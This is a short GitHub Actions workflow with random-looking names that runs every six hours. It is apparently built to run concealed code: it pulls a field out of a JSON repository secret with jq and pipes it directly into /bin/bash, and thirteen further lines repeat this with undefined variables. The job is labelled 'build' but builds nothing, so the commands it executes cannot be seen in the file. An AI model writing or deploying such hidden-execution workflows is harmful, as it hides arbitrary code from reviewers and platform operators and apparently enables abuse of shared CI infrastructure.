name: baozhongchu5657
on:
  workflow_dispatch:
  schedule:
    - cron: '0 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: baozhongchu5657
        env:
          aheb0345: ${{ secrets.aheb0345 }}
        run: |
          echo $aheb0345 | jq -r .alwh4537 | /bin/bash
          echo $t13638 | jq -r .tfcb3889 | /bin/bash
          echo $dfuo2346 | jq -r .eeny8796 | /bin/bash
          echo $kzqev13 | jq -r .l35883 | /bin/bash
          echo $v1 | jq -r .pammn90686 | /bin/bash
          echo $lxd32 | jq -r .ptqo5142 | /bin/bash
          echo $soknl029 | jq -r .u8 | /bin/bash
          echo $x780 | jq -r .exrzi94637 | /bin/bash
          echo $c7 | jq -r .bcb5 | /bin/bash
          echo $td3598 | jq -r .u5 | /bin/bash
          echo $bgyk102 | jq -r .inai030 | /bin/bash
          echo $ce985 | jq -r .u3 | /bin/bash
          echo $drxfu2 | jq -r .x18 | /bin/bash
          echo $c16526 | jq -r .hoj518 | /bin/bash

